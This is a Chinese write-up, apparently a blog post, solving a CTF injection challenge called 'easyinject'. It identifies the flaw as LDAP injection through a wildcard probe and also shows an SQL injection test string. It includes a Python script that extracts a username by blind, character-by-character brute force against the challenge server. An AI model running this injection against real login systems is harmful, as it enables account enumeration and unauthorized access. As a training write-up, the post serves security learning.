第一届 “东软杯”_easyinject题解

yulate

发布于 2023-05-02 11:12:21

1090

发布于 2023-05-02 11:12:21

文章被收录于专栏：yulate的网络安全技术分析yulate的网络安全技术分析

本文最后更新于 507 天前，其中的信息可能已经有所发展或是发生改变。

前言

这道题是一道注入题从题目名字就可以发现。

详细步骤

在开始做题使用 ' or 1=1# 进行注入的时候发现完全不会生效，于是联想道之前看见过的ldap注入题

使用*进行尝试确实是ldap注入题。

如何主页的源码中存在提示

提示说明flag是一串特殊的账户，盲注出用户即可

import string
import requests

url = "http://47.106.172.144:2333/?user={}*&pass=123456"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
    "Content-Type": "application/xml"
}
chars = string.ascii_letters+string.digits + '_'

flag = "ldap"
for i in range(1,100):
    for s in chars:
        payload = url.format(flag + s)
        result = requests.get(url=payload,headers=headers)

        if result.status_code == 200:
            if "找不到用户" not in result.text:
                flag += s
                print(flag)
                break
        else:
            print('检测到爬虫')